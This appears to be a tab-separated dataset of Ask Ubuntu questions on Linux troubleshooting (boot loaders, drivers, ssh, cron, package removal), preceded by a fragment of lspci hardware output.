memory at d8406100 ( 64-bit , non-prefetchable ) [ size=16 ] capabilities : < access denied > kernel driver in use : mei_me 00:1a.0 usb controller : intel corporation 5 series/3400 series chipset usb2 enhanced host controller ( rev 05 ) ( prog-if 20 [ ehci ] ) subsystem : lenovo device 38aa flags : bus master , medium devsel , latency 0 , irq 16 memory at d8405c00 ( 32-bit , non-prefetchable ) [ size=1k ] capabilities : < access denied > kernel driver in use : ehci-pci 00:1b.0 audio device : intel corporation 5 series/3400 series chipset high definition audio ( rev 05 ) subsystem : lenovo device 38af flags : bus master , fast devsel , latency 0 , irq 44 memory at d8400000 ( 64-bit , non-prefetchable ) [ size=16k ] capabilities : < access denied > kernel driver in use : snd_hda_intel 00:1c.0 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 1 ( rev 05 ) ( prog-if 00 [ normal decode ] ) flags : bus master , fast devsel , latency 0 bus : primary=00 , secondary=01 , subordinate=04 , sec-latency=0 i/o behind bridge : 00004000-00004fff memory behind bridge : d7400000-d83fffff prefetchable memory behind bridge : 00000000d0400000-00000000d13fffff capabilities : < access denied > kernel driver in use : pcieport 00:1c.1 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 2 ( rev 05 ) ( prog-if 00 [ normal decode ] ) flags : bus master , fast devsel , latency 0 bus : primary=00 , secondary=05 , subordinate=05 , sec-latency=0 i/o behind bridge : 00003000-00003fff memory behind bridge : d6400000-d73fffff prefetchable memory behind bridge : 00000000d1400000-00000000d23fffff capabilities : < access denied > kernel driver in use : pcieport 00:1c.2 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 3 ( rev 05 ) ( prog-if 00 [ normal decode ] ) flags : bus master , fast devsel , latency 0 bus : primary=00 , secondary=06 , subordinate=06 , sec-latency=0 i/o behind bridge : 00002000-00002fff memory behind bridge : d5400000-d63fffff prefetchable memory behind bridge : 00000000d2400000-00000000d33fffff capabilities : < access denied > kernel driver in use : pcieport 00:1c.4 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 5 ( rev 05 ) ( prog-if 00 [ normal decode ] ) flags : bus master , fast devsel , latency 0 bus : primary=00 , secondary=07 , subordinate=0a , sec-latency=0 i/o behind bridge : 00001000-00001fff memory behind bridge : d4400000-d53fffff prefetchable memory behind bridge : 00000000d3400000-00000000d43fffff capabilities : < access denied > kernel driver in use : pcieport 00:1d.0 usb controller : intel corporation 5 series/3400 series chipset usb2 enhanced host controller ( rev 05 ) ( prog-if 20 [ ehci ] ) subsystem : lenovo device 38b8 flags : bus master , medium devsel , latency 0 , irq 23 memory at d8405800 ( 32-bit , non-prefetchable ) [ size=1k ] capabilities : < access denied > kernel driver in use : ehci-pci 00:1e.0 pci bridge : intel corporation 82801 mobile pci bridge ( rev a5 ) ( prog-if 01 [ subtractive decode ] ) flags : bus master , fast devsel , latency 0 bus : primary=00 , secondary=0b , subordinate=0b , sec-latency=32 capabilities : < access denied > 00:1f.0 isa bridge : intel corporation mobile 5 series chipset lpc interface controller ( rev 05 ) subsystem : lenovo device 38be flags : bus master , medium devsel , latency 0 capabilities : < access denied > kernel driver in use : lpc_ich 00:1f.2 sata controller : intel corporation 5 series/3400 series chipset 4 port sata ahci controller ( rev 05 ) ( prog-if 01 [ ahci 1.0 ] ) subsystem : lenovo device 38c1 flags : bus master , 66mhz , medium devsel , latency 0 , irq 42 i/o ports at 5048 [ size=8 ] i/o ports at 505c [ size=4 ] i/o ports at 5040 [ size=8 ] i/o ports at 5058 [ size=4 ] i/o ports at 5020 [ size=32 ] memory at d8405000 ( 32-bit , non-prefetchable ) [ size=2k ] capabilities : < access denied > kernel driver in use : ahci 00:1f.3 smbus : intel corporation 5 series/3400 series chipset smbus controller ( rev 05 ) subsystem : lenovo device 38bf flags : medium devsel , irq 10 memory at d8406000 ( 64-bit , non-prefetchable ) [ size=256 ] i/o ports at 5000 [ size=32 ] 00:1f.6 signal processing controller : intel corporation 5 series/3400 series chipset thermal subsystem ( rev 05 ) subsystem : lenovo device 38c0 flags : bus master , fast devsel , latency 0 , irq 11 memory at d8404000 ( 64-bit , non-prefetchable ) [ size=4k ] capabilities : < access denied > 05:00.0 network controller : qualcomm atheros ar9285 wireless network adapter ( pci-express ) ( rev 01 ) subsystem : lenovo device 30a1 flags : bus master , fast devsel , latency 0 , irq 17 memory at d6400000 ( 64-bit , non-prefetchable ) [ size=64k ] capabilities : < access denied > kernel driver in use : ath9k 06:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8101e/rtl8102e pci express fast ethernet controller ( rev 02 ) subsystem : lenovo device 392e flags : bus master , fast devsel , latency 0 , irq 40 i/o ports at 2000 [ size=256 ] memory at d2410000 ( 64-bit , prefetchable ) [ size=4k ] memory at d2400000 ( 64-bit , prefetchable ) [ size=64k ] expansion rom at d2420000 [ disabled ] [ size=128k ] capabilities : < access denied > kernel driver in use : r8169 ff:00.0 host bridge : intel corporation core processor quickpath architecture generic non-core registers ( rev 02 ) subsystem : lenovo device 392b flags : bus master , fast devsel , latency 0 ff:00.1 host bridge : intel corporation core processor quickpath architecture system address decoder ( rev 02 ) subsystem : lenovo device 392b flags : bus master , fast devsel , latency 0 ff:02.0 host bridge : intel corporation core processor qpi link 0 ( rev 02 ) subsystem : lenovo device 392b flags : bus master , fast devsel , latency 0 ff:02.1 host bridge : intel corporation core processor qpi physical 0 ( rev 02 ) subsystem : lenovo device 392b flags : bus master , fast devsel , latency 0 ff:02.2 host bridge : intel corporation core processor reserved ( rev 02 ) subsystem : lenovo device 392b flags : bus master , fast devsel , latency 0 ff:02.3 host bridge : intel corporation core processor reserved ( rev 02 ) subsystem : lenovo device 392b flags : bus master , fast devsel , latency 0
419452	how download mails folder from command line ?	i want to download mails ( batch download ) i have in the `` sample '' folder from my yahoo mail to local folder . any command-line client for downloading mails from mail ? thanks
419453	./configure.sh while installing charm toolkit giving unsuccessful results	following is result snapshot of ./configure.sh - cflags -o2 -g charm_cflags -m32 -wall -wundef -wwrite-strings -wmissing-prototypes -fstack-protector-all -wendif-labels -wmissing-include-dirs -wempty-body -wnested-externs -wformat-security -wformat-y2k -winit-self -wignored-qualifiers -wold-style-declaration -wold-style-definition -wtype-limits ldflags -m32 make make python /usr/bin/python3 build_ext options build_ext install install host cpu i386 wget /usr/bin/wget gprof enabled no profiler no static build no -werror enabled no integer module yes ecc module yes pairing module yes disable benchmark no libm found yes libgmp found yes libpbc found no libcrypto found yes documentation no how to `` enable '' and convert `` no '' s to `` yes '' , because this problem is making problem in make command ( running after this ) also ? thanks
419454	ca n't install the x-fi driver from the creative site	because i ca n't adjust the bass/treble levels through alsamixer i tried installing the drivers for my x-fi titanium pro card from the creative website . the readme file tells me to just execute make and make install as root in the directory but when i do that i get the following error : the file or directory does not exist : # include sound/driver.h > ^ compilation terminated . that happens after the make command . i have installed the make essentials and the generic headers .
419457	xfce panel with `` close '' button	i 'm using xubuntu 13.1 with xfce 4.1 and i ask myself if it 's possible to get something like a `` close '' button for each open application in the xfce panel . ( hope the image helps to understand what i mean ) maybe there 's a simple configuration to realize this or an plugin ? i mean to just click on the `` x '' to close the application ... instead of right click and choose `` close '' .
419458	java wo n't run .jars	i just surfed around for like 2 hours and did n't find anything what really helped me . i installed java like it was told me on the ubuntu site , and everything seemed to be working fine . but as i wanted to start my .jar . there popped up this wierd `` the file is not marked as executable '' thing . so i searched for an answer , and found plenty of them . there were like three major answers : open terminal and make this chmod +x thing right click , file-options , and make a tick at `` allow data to act as programm '' open the jar via terminal with java -jar so like you probably can tell , nothing worked for me , here are my results terminal tells me the file could not be found ( believe me , i typed in the right path , i doublechecked it like a thousend times ) there does n't happen anything when i try to start it terminal reponds : the programm java is in this ? packages ? ( sorry but i translate this from german ) : default-jre gcj-4.6-jre-headless gcj-4.7-jre-headless openjdk-7-jre-headless openjdk-6-jre-headless please try to do sudo apt-get install package but im sure to have installed this right d : so i would really appreciate a fast answer , otherwise i think i 'll get totaly crazy : p
419461	x11vnc terminates with x error badcursor	running ubuntu 12.04 on a xen vps , i 'm trying to set up a vnc access to a virtual display : xvfb :99 -screen 0 800x600x8 & export display=:99 xeyes & x11vnc -usepw -display :99 -forever & on client side , i use realvnc viewer . it works so far , remote cursor follows my local one and two fancy eyes are following remote cursor . but - after half a minute x11vnc terminates ( regardless if i move the cursor within vnc viewer window or just park it aside and wait ) : 11/02/2014 13:47:56 created selwin : 0x40001e 11/02/2014 13:47:56 called initialize_xfixes ( ) caught x11 error : 11/02/2014 13:47:56 deleted 25 tile_row polling images . 11/02/2014 13:47:56 restored x server key autorepeat to : 1 x error of failed request : badcursor ( invalid cursor parameter ) major opcode of failed request : 142 ( xfixes ) minor opcode of failed request : 25 ( xfixesgetcursorimageandname ) it seems that it happens unexpectedly from clients point of view : < 14 > 2014-02-11t13:47:56.084z laptop vncviewer [ 3932 ] : cconncommon : close : the connection closed unexpectedly . searching internet , i found an ffmpeg-related topic and yet another one , both about badcursor . no clue if and how i could use their workarounds . ideas are greatly appreciated !
419463	ubuntu 13.10 not detected my hard disk partician dual boot with xp sp3	kindly , help some for me , i recently installed ubuntu 13.10 in my compaq presario c700 laptop . i have pre installed xp sp3 in my laptop.but when i run ubuntu 13.10 this is not showing my other partician , i have 4 partician in my laptop . can somebody fix this problem ? thanks vidhya bhushan
419464	error : no such partition grub rescue	i have make drives on my hp laptop b/c i have to install linux on one drive while using windows on other. ? one of that drive is if 100gb but while installing linux ( version fedora ) i have made this drive to be if 40gb . and then install linux . ran linux and it worked . i shutdown linux . open windows 7. then for that remaining 60gb i made another partition . i restarted my laptop and an error came error : no such partition entering rescue mode ... grub rescue > i at least want my window 7 back because it contains all of my data . please please help me that how to fix that error ... ...
419465	how to remove minitube completely to scratch ?	i tried to completely remove and re-install minitube for personal issues and i did it with : sudo apt-get remove -- purge minitube-* but after re-installation i got all history and subscriptions back . from where did it withdraw this config ? how can i make it look clean as it 's like was installed for the first time ?
419470	kazam shortcut keys not working in gnome 3	i am using gnome 3.10 on the top of ubuntu 13.10 and the stock kazam screencaster coming with ubuntu ( 1.4.3-0ubuntu1 ) . kazam works properly , however the start/pause/finish shortcuts are not working at all . they 're supposed to be super+ctrl+r , p and f respectively . it used to work properly with unity . do you have any idea what 's blocking them in gnome3 ? update feb 12 , 2014 : i realized that several times the shortcuts worked but not always and not consistently .
419474	grub support for triple boot	ok , so if you have moral conflicts on the eula then think of this as an educational question . so i have been wondering if there is a way to triple boot hackintosh in addition to my current setup . i have windows 7 home premium x64 and ubuntu precise pangolin 12.04 lts x64 dual booting with the standard grub bootloader for ubuntu 12.04 . i have a partition i could convert for mac os x : my recovery drive . but if i were to do this , how would i configure grub to detect the partition , or , would the osx installation overwrite the grub with a mac bootloader , and would that then autodetect my os ' on other partitions ? i would prefer to use grub for this , and i still have the drive to repair my grub installation if its overwritten with the osx one . edit : okay , so as i see that installing mac os x is not a problem , but i am not sure if the mac os x bootloader would suffice to boot all three operating systems . so if it did not , how would i proceed to reinstall grub without access to ubuntu or ( possibly ) windows . i do beleive if all goes well one of three scenarios will occur : 1.all of the operating systems are available to boot from startup . 2.windows and os x are available to boot from startup , but ubuntu is not detected . 3.only os x will boot upon startup in situations 2 and 3 i will have to reinstall grub without ubuntu , possibly off of a recovery drive . i highly doubt that the bootloader would detect linux but not windows . so what i need to know is how to configure grub in situations 2 and 3 .
419479	wireless network not working	i am a newbie to ubuntu and i am facing problems connecting my home 's wifi . i installed ubuntu recently and the wifi worked once , though it was getting disconnected a lot of times . since then my home 's wifi is n't getting detected in when i turn on bluetooth . all other wifi 's in range , for example , my neighbors ' wifi is getting detected . only my home wifi is n't getting detected . i would really appreciate if someone could give me a step wise instruction to solving this issue as i am a newbie .
419483	is it possible to exclude folders in clonezilla ?	i want to backup my xubuntu using clonezilla , but i want to exclude some folders , like pictures . is it possible to exclude some folders from being backed up on clonezilla ? i have 18gb of music , 20 gb of movies and 12gb of ebooks that are already backed up elsewhere , is it possible to exclude them from being backed up in clonezilla ?
419484	how to run a script on ubuntu shutdown when it needs network on	i have an upstart script that needs to run on reboot or shutdown , but it needs to access the network to post an http requests and wait for the replies , i tried start on starting rc and start on starting ( rc and net-device-up iface=eth0 ) but no luck .
419491	how to get drivers for lenovo essential e4325	i have windows 8 installed on my lenovo e4325 laptop ... i want to install ubuntu as a dual boot ... please anyone let me know do i need to install any additional drivers or are the drivers comes with the os after installing the ubuntu version ... if yes , how ?
419493	windows crashed and i cant boot into windows recovery disk or installer . pc boots into ubuntu . i can access windows partition from ubuntu	i am dual booting ubuntu 13.10 and windows 7 . somehow , a file system on windows is corrupt . i can still see windows files from ubuntu as its working properly . i tried using windows recovery discs and booting from different windows installers as well but when ever the boot is about to start , ubuntu is loaded . whenever i try opening the windows 7 ( loader ) on grub thing , i get the message bootmgr is corrupt . can not boot .. what can i do ?
419497	why did all my gedit plugins croak on 13.10 ( and how do i fix them ) ?	i had a nice setup going on my old laptop . i was running gedit 3.4.1 on ubuntu 12.04 with some nice plugins : zencoding gdp completion gdp format then my laptop died a splendid death and i bought a new laptop and installed 13.10 and started restoring my lovely plugin arrangement and they do n't work . when i try to enable zencoding or either of the gdp plugins i see an error : the plugin zen coding could not be loaded an error occurred : plugin loader 'python2 ' was not found i 've found instructions that suggest editing ~/.local/share/gedit/plugins/zencoding.plugin to tweak the loader , but python is similarly `` not found '' and if i change it to python3 the error changes to just `` an error occurred : failed to load '' how do i get these plugins working in gedit 3.8.3 on 13.10 ?
419502	terminal command prompt missing	i 'm using ubuntu 12.04 . the command prompt ( username @ desktop : ~ $ ) in terminal went missing . how do i get it back ? thanks solved by searching . i 'm just a week new to linux . thank you very much olli and wolfgang vogl for your quick responses and great information , but it did n't fix my problem . if i could have gained root access , which is normally done through the terminal ( where i could n't see what i was typing ) , i probably could have fixed the problem by removing the `` # '' from the `` force_color_prompt=yes '' command line , and then setting the colors to whatever i wanted . i 've read numerous blogs , sites , etc . about missing command prompts , and most referred to the .bashrc file which allows you to configure the color of the command prompt sections , just as olli and wolfgang stated . i created a new user account , ensured that it 's terminal worked properly , and it did . then i compared it 's .bashrc file to the accounts .bashrc file that did n't work . they were the same . i kept searching and found the solution at how to reset the terminal properties and preferences ? , answered by aneeshep . i could n't believe how easy it was to fix . the problem was that i had changed my background theme to one of my own which also changed other sections of that user 's account profile , namely the terminal . with my background theme , i could n't see the file , edit , etc . menu bar for the terminal . also , with the terminal not maximized , i did n't realize the menu bar at the very top of the screen was for the terminal . to fix it , just navigate to edit > profile preferences . select the colors tab , and configure the colors as needed . i 've read about numerous other people having the same problem , and i 'm sure they just changed their background theme . if the resolution was just a little easier to find . i want to thank aneeshep , olli and wolfgang vogl again . thanks .
419510	ubuntu not installing on my laptop	i have an hp and i have booting 12.04 on a dvd and when i start my computer , only loading screen shows up and it loads but nothing happens . the same problem happens with 13.10 . how can i fix this ?
419511	crunch created a very large dictionary	i am using crunch to create a dictionary , which will contain all combinations for 8 characters . it stopped creating the dictionary after a while , because it requires 56 tb of space . how can i fix this ?
419512	file sharing among local accounts is not working for me	what i 've done : i installed libpam-smbpass . restarted . opened the properties window of the drive ( partition ) where the folder i want to share is located . in its share tab , checked `` share this folder '' , and `` allow other to create ... '' next , went to the other ubuntu account to test it . the drive in question no longer pops up a window for me to enter the admin password . it just does nothing . namely it does n't open up . what am i missing ? btw , when i first attempted to share the folder , ubuntu asked me if i wanted to install samba , so i got it installed and restarted .
419514	installing ubuntu with windows 8.1	i want to install ubuntu 13.04 on my new laptop which is currently loaded with windows 8.1 . i was used to install ubuntu using wubi installer in my older pc which was running windows 7 . but on this page i found that it is not preferable to install ubuntu on windows 8 with uefi firmware . so currently i 'm running ubuntu on vmware player but it 's performance is real poor . please tell me the proper and safe way to install ubuntu on windows 8 preloaded systems with uefi firmware . also let me know if there is any way to improve ubuntu performance on vmware .
419516	3g modem detected as mass media	i have a 3g modem with vendor code 1c9e and product is 6061 omega 3.75 g. since kubuntu lts 12.04 it has been detected as mass media . updating to 12.04.3 did not solve the issue .
419520	i installed ubuntu 12.04 lts , and i boot into gnu grub ?	so i installed ubuntu using the wubi installer . i installed 12.04 lts . i am running on windows 7 as my primary os . everything was working fine until i shut down my computer . i was then greeted by `` gnu grub ... . press tab to view a list of commands . '' the problem i face similar to the one in this video : https : //www.youtube.com/watch ? v=prdt7exeiq4 so i uninstalled ubuntu and reinstalled it , and did a few tests . if i restart my computer , it boots back into ubuntu just fine . but if i shut it down entirely and then try to boot back into ubuntu , i get the error again . from what i see , most people who have grub errors seem to be booting from the live disk . and i know that nvidia apparently causes some problems and one fix is to boot into `` nomodeset '' but when i look at the screens provided in those fixes , it seems like they get a different prompt than me ? i know i have a nvidia graphics card .
419524	command line pdf printing - automatic filenames based on timestamp	ubuntu 12.04 lts , 3.8.0-35-generic kernel , firefox 27.0 if i print a text file to pdf , i get a default filename which is always the same . ( it is always `` output.pdf '' ) how can i have automatic file name based on timestamp ? how can i use that particular printer in command line ? what is the name of that ( virtual ) printer i 'm using ? also from firefox , if i print to pdf how can i have automatic filename based on timestamp ? following some commands and the output i received : ~ $ lp `` $ in '' lp : error - no default destination available . ~ $ lpr `` $ in '' lpr : error - no default destination available . ~ $ dpkg -- list | grep ' cups ' ii cups 1.5.3-0ubuntu8 common unix printing system ( tm ) - server ~ $ ps -ef|grep cups | grep -v grep root 867 1 0 14:51 ? 00:00:00 /usr/sbin/cupsd -f ~ $ cups -- version cups : command not found ~ $ cups-pdf cups-pdf : command not found i would like not to install other pdf printer , because the default one works very well .
419525	how do i automount a unionfs-fuse filesystem ?	i can run the shell command : unionfs-fuse /changedata=rw : /immutedata=ro -o cow /data this mounts the filesystem exactly how i want to . now i need to incorporate it into the automounter so that it 's remounted upon demand . what i tried in /etc/auto.misc : /data -fstype=fuse , cow /changedata=rw : /immutedata=ro what automount -- debug -f /etc/auto.master says when i do ls /data : handle_packet : type = 5 handle_packet_missing_direct : token 19 , name /data , request pid 6063 attempting to mount entry /data lookup_mount : lookup ( file ) : looking up /data lookup_mount : lookup ( file ) : /data - > -fstype=fuse , cow /changedata=rw : /immutedata=ro parse_mount : parse ( sun ) : expanded entry : -fstype=fuse , cow /changedata=rw : /immutedata=ro parse_mount : parse ( sun ) : gathered options : fstype=fuse , cow parse_mount : parse ( sun ) : dequote ( `` /changedata=rw : /immutedata=ro '' ) - > /changedata=rw : /immutedata=ro parse_mapent : parse ( sun ) : gathered options : fstype=fuse , cow parse ( sun ) : invalid location dev_ioctl_send_fail : token = 19 failed to mount /data google reveals little . man pages are rather empty on the incorporation of this filesystem . maybe i should just put it in /etc/fstab and ask users to remount ?
419526	easy way to install a .deb package without aptitude or synaptic ?	i keep trying to install programs , by simply downloading the program , and clicking on it , but i see things are not that simple . has anyone come up with a simple way to install different programs , without having to rely on synaptic or aptitude ? example : i tried to install a .deb package . went to the site , downloaded the package , opened up the command line ( after making the file executable ) , the errors began . first there was a dependency file that was required , then there was a public key that was needed , man can someone make this a little bit simpler for a newbie . i think a newbie spends half of his time searching google to figure out how to make things work on linux . someone please help make this more simple ? tanks
419527	installing jhbuild on ubuntu	i wish write gui applications using pygtk on my ubuntu 13.10 which i installed recently . this is my first linux os so please be gentle with your jargon . i tried to import pygtk but could n't because the module is n't installed on my comp.i tried this link : https : //python-gtk-3-tutorial.readthedocs.org/en/latest/install.html the procudure states that pygtk/pygobject come prebuilt in distros . but i ca n't figure that out . how do i install a prebuilt package from the official repository ? i also tried using jhbuild but got stuck at the same point as the op in this question : trouble with jhbuild installation sadly no satisfactory answer has been given . please tell me how to go about this issue . edit : whereis pygtk returns pygtk : /usr/share/pygtk
419532	nemo custom action ( .sh script ) does not execute	i created a .sh script for simple ocr-ing of screenshots that i make with shutter . the script looks like this ( ocrfile.sh ) : # ! /bin/bash convert $ 1 /tmp/output.pnm cat /tmp/output.pnm | pamstretch 4 > /tmp/stretched.pnm convert /tmp/stretched.pnm -colorspace gray /tmp/output600dpi.tif tesseract /tmp/output600dpi.tif ./outputtext -l eng this script does some image enhancing that is required when ocring with tesseract . it does the job properly if it is called from the terminal . what i wanted was to do the whole process within nemo , so i created a custom action named ocr.nemo_action inside /home/user1/.local/share/nemo/actions with the following content : [ nemo action ] name=ocr the screenshoot comment=ocr function for nemo file manager exec= < ocrfile.sh % f > icon-name=gtk-execute selection=any extensions=png ; this nemo action do n't produce output with the script given above . the .sh script is also in the folder for nemo 's custom actions . please help !
419537	sony ericsson sbh50 bluetooth headset not working on 13.10	i recently upgraded my bluetooth headset from a mw600 to a sbh50 . the mw600 worked fine , but i can not get the sbh50 working . i can pair with the device , and it shows up in my sound settings , but when i select it as an output , nothing happens . the mode is set by default to hsp but when i try to change it to a2dp , i 'm taken back to my 'speakers ' output and nothing actually changes ( when i go back to the bluetooth output , the mode is still hsp ) . whatever mode i use , no sound comes through to the headset . i 've used bluetooth manager but with no luck . i 've tried selecting headset service and sound service , but then pulseaudio crashes . anyone know what i need to do to get this headset working ? update : i 've just updated to 13.10 ( from 13.04 ) and the same thing is happening : (
419539	config file of shell complete	i want add autocompletion to my script . i wrote bash code for autocomplete ( using this tutor http : //tldp.org/ldp/abs/html/tabexpansion.html ) and put it to /etc/bash_completion.d/ then i execute in bash complete -f _main_complete -o filenames ./script.sh and it 's works . but after reboot i need write this command again . sure i can add this to .bashrc , but it looks bad . where config file for complete located ?
419540	apt-get autoremove removes everything	i 'm running 13.10 . i removed emacs , and then ran sudo apt-get autoremove , but it decided that it needed to remove all of these other things ( a lot of which i probably need ) . here is the full list : the following packages were automatically installed and are no longer required : ghc ghc-haddock latex-cjk-common libbsd-dev libffi-dev libgail-3-doc libgail-doc libgda-5.0-4 libgda-5.0-common libgdk-pixbuf2.0-dev libgdk-pixbuf2.0-doc libgdl-3-5 libgdl-3-common libghc-data-default-doc libghc-dlist-dev libghc-dlist-doc libghc-mtl-doc libghc-transformers-doc libghc-x11-doc libghc-x11-xft-doc libgladeui-2-4 libgladeui-common libglib2.0-dev libglib2.0-doc libgmp-dev libgmpxx4ldbl libgstreamer1.0-dev libgtk-3-doc libgtk2.0-doc libgtksourceview-3.0-doc libharfbuzz-dev libid3tag0 libimlib2 libintl-perl libio-stringy-perl libipc-signal-perl libjson-perl liblockdev1 libmime-types-perl libnotify-doc libopts25-dev libpango1.0-doc libpcre3-dev libpcrecpp0 libpng12-dev libproc-waitstat-perl librecode0 libregexp-assemble-perl libremctl1 libreoffice-report-builder-bin libsource-highlight-common libsp1c2 libstdc++5 libtelepathy-glib-doc libtext-unidecode-perl libtie-ixhash-perl libvala-0.20-0 libwayland-dev libxcb-render0-dev libxcb-shm0-dev libxkbcommon-dev libxml-libxml-perl libxml-namespacesupport-perl libxml-parser-perl libxml-sax-base-perl libxml-sax-expat-perl libxml-sax-perl libxml2-dev libxml2-doc libxml2-utils m-tx manpages-posix manpages-posix-dev mercurial mercurial-common mime-construct moreutils musixtex openbsd-inetd pfb2t1c2pfb pidgin-encryption plt-scheme pmx policykit-1-doc python-bzrlib python-compizconfig python-configobj python-debianbts python-fpconst python-keyring python-launchpadlib python-lazr.restfulclient python-lazr.uri python-oauth python-reportbug python-scour python-secretstorage python-simplejson python-soappy python-wadllib python3-decorator python3-magic python3-simplegeneric quilt racket racket-common racket-doc remctl-client reportbug schroot-common screen sgml-data sp suckless-tools swath tex4ht tex4ht-common texinfo texlive-bibtex-extra texlive-fonts-extra-doc texlive-formats-extra texlive-games texlive-generic-extra texlive-humanities texlive-humanities-doc texlive-lang-african texlive-lang-cjk texlive-lang-cyrillic texlive-lang-czechslovak texlive-lang-english texlive-lang-european texlive-lang-french texlive-lang-german texlive-lang-indic texlive-lang-italian texlive-lang-other texlive-lang-polish texlive-lang-portuguese texlive-lang-spanish texlive-math-extra texlive-music texlive-omega texlive-plain-extra texlive-publishers texlive-publishers-doc texlive-science texlive-science-doc texlive-xetex tree valac-0.20 valac-0.20-vapi wmbubble wmbutton wmcalclock wmhdplop wmmemload wmnd wmweather xfonts-x3270-misc xmonad xsltproc use 'apt-get autoremove ' to remove them . i tried installing and removing emacs again , but still it insists i remove all of these . libreoffice and python-twisted used to be on here until i set them to manual install . why does ubuntu want to remove all of these ?
419544	ubuntu for lenovo g510 laptop ?	how good is ubuntu suitable for lenobo g510 . i am planning to buy a new laptop and g510 falls in my affordable range . there i am wondering which spec to take ? the one with ati card or not ? is there any problem with wifi and graphics driver ? i need a laptop to use ubuntu on a daily basis for work and entertainment . if lenovo g510 is not suitable , what else is ? budger 45k inr .
419546	ssh never ask for a password	somehow my ssh never wants to ask me for a password . so i setup a vps on some random server somewhere in the world and i want to connect to it with ssh . i can setup a key , but when i do this : ssh -l some-user ip i get the error : received disconnect from # # . # # . # # . # # : 2 : too many authentication failures for som-user when i look at the details , i can see that password is one of the options : debug1 : offering rsa public key : some-user @ computer debug1 : authentications that can continue : publickey , password yet ssh never asks me for the password . it tries 5 times with what i suspect is the publickey method and then fails . why would n't ssh try with the password ? ! just in case , my ssh_config file has : passwordauthentication yes full log ssh -v -l root # # . # # . # # . # # openssh_6.1p1 debian-4 , openssl 1.0.1c 10 may 2012 debug1 : reading configuration data /home/someuser/.ssh/config debug1 : reading configuration data /etc/ssh/ssh_config debug1 : /etc/ssh/ssh_config line 19 : applying options for * debug1 : connecting to # # . # # . # # . # # [ # # . # # . # # . # # ] port 22. debug1 : connection established . debug1 : identity file /home/someuser/.ssh/id_rsa type 1 debug1 : checking blacklist file /usr/share/ssh/blacklist.rsa-2048 debug1 : checking blacklist file /etc/ssh/blacklist.rsa-2048 debug1 : identity file /home/someuser/.ssh/id_rsa-cert type -1 debug1 : identity file /home/someuser/.ssh/id_dsa type -1 debug1 : identity file /home/someuser/.ssh/id_dsa-cert type -1 debug1 : identity file /home/someuser/.ssh/id_ecdsa type -1 debug1 : identity file /home/someuser/.ssh/id_ecdsa-cert type -1 debug1 : remote protocol version 2.0 , remote software version openssh_6.2p2 ubuntu-6 debug1 : match : openssh_6.2p2 ubuntu-6 pat openssh* debug1 : enabling compatibility mode for protocol 2.0 debug1 : local version string ssh-2.0-openssh_6.1p1 debian-4 debug1 : ssh2_msg_kexinit sent debug1 : ssh2_msg_kexinit received debug1 : kex : server- > client aes128-ctr hmac-md5 none debug1 : kex : client- > server aes128-ctr hmac-md5 none debug1 : sending ssh2_msg_kex_ecdh_init debug1 : expecting ssh2_msg_kex_ecdh_reply debug1 : server host key : ecdsa xx : xx : ... : xx : xx debug1 : host ' # # . # # . # # . # # ' is known and matches the ecdsa host key . debug1 : found key in /home/someuser/.ssh/known_hosts:38 debug1 : ssh_ecdsa_verify : signature correct debug1 : ssh2_msg_newkeys sent debug1 : expecting ssh2_msg_newkeys debug1 : ssh2_msg_newkeys received debug1 : roaming not allowed by server debug1 : ssh2_msg_service_request sent debug1 : ssh2_msg_service_accept received debug1 : authentications that can continue : publickey , password debug1 : next authentication method : publickey debug1 : offering rsa public key : /home/someuser/.ssh/id_rsa debug1 : authentications that can continue : publickey , password debug1 : offering rsa public key : someuser @ computer debug1 : authentications that can continue : publickey , password debug1 : offering rsa public key : someuser @ computer debug1 : authentications that can continue : publickey , password debug1 : offering dsa public key : someuser @ computer debug1 : authentications that can continue : publickey , password debug1 : offering rsa public key : someuser @ computer debug1 : authentications that can continue : publickey , password debug1 : offering rsa public key : someuser @ computer received disconnect from # # . # # . # # . # # : 2 : too many authentication failures for root
419547	losing connection on to headless machine - bamt	so i used to run bamt ( a mining os which uses ubuntu ) via ethernet but i 'd like to move the rig to another room so i spent the entire day installing a wireless usb stick on there with wicd . it finally worked and i unplugged the ethernet cable , reboot the rig , load the bamt screen from another computer but when it starts mining , the page stops loading and i lose my ssh connection to the rig . it sounds like it starts mining anyways but i lose connection to it for some reason . is this a known issue ? another weird thing is that the wireless usb thing seems to turn off on reboot . like right now , i reboot with ethernet plugged in , once on , i connect the wireless usb stick , iwconfig says it 's off ( though it does see it ) so i restart it with : sudo ip link set wlan0 up and then it works ? could this be part of the issue ?
419548	how to setup a root cron job properly	i tried to setup a root cron job to run a bash script as root , to run at minute 7,37 , every hour , every day of month , every month . this script is located in /usr/bin and named tunlrupdate.sh is used to update the dns of tunlr . $ ls -l /usr/bin/tunlrupdate.sh -rwxr-xr-x 1 root root 2133 sep 24 15:42 /usr/bin/tunlrupdate.sh this bash script is available here . when invoked the script write what 's happening in a log located in /var/log/tunlr.log to add this root cron job i used the standard for root 's crontab $ sudo crontab -e and inserted these 2 lines at the end , root is meant to run the script as root # check for updated tunlr dns every 30 minutes at the hour + 7 mn and hour + 37 mn 07,37 * * * * root /usr/bin/tunlrupdate.sh a later command $ sudo crontab -l confirmed that the cron job has been inserted . i did reboot ubuntu and was checking in the log file if the cron job was launched properly . however there is nothing in the logfile /var/log/tunlr.log meaning the job was never successfully launched . i did check that if i run the script from the command line $ sudo /usr/bin/tunlrupdate.sh then the logfile is updated accordingly . why is this cron job not running as planned in my system ? update 1 : all the proposed solutions so far do not work . i thank olli for a cli to list the system log sudo grep cron /var/log/syslog . however i did get a cron error cron [ 13092 ] : ( root ) cmd ( [ -x /usr/lib/php5/maxlifetime ] & & [ -d /var/lib/php5 ] & & find /var/lib/php5/ -depth -mindepth 1 -maxdepth 1 -type f -cmin + $ ( /usr/lib/php /maxlifetime ) ! -execdir fuser -s { } 2 > /dev/null \ ; -delete ) with the suggested path= insertion & use of absolute path from root for functions in the script or without this suggested solutions here . i still get this error . after some googling i pinpointed the error in the file /usr/lib/php5/maxlifetime as is explained here : change # ! /bin/sh -e -- > # ! /bin/sh -x then listing the cron error log in my system sudo grep cron /var/log/syslog feb 11 18:07:01 marius-pc cron [ 14067 ] : ( root ) cmd ( root /usr/bin/tunlrupdate.sh ) feb 11 18:07:01 marius-pc cron [ 14066 ] : ( root ) mail ( mailed 1 byte of 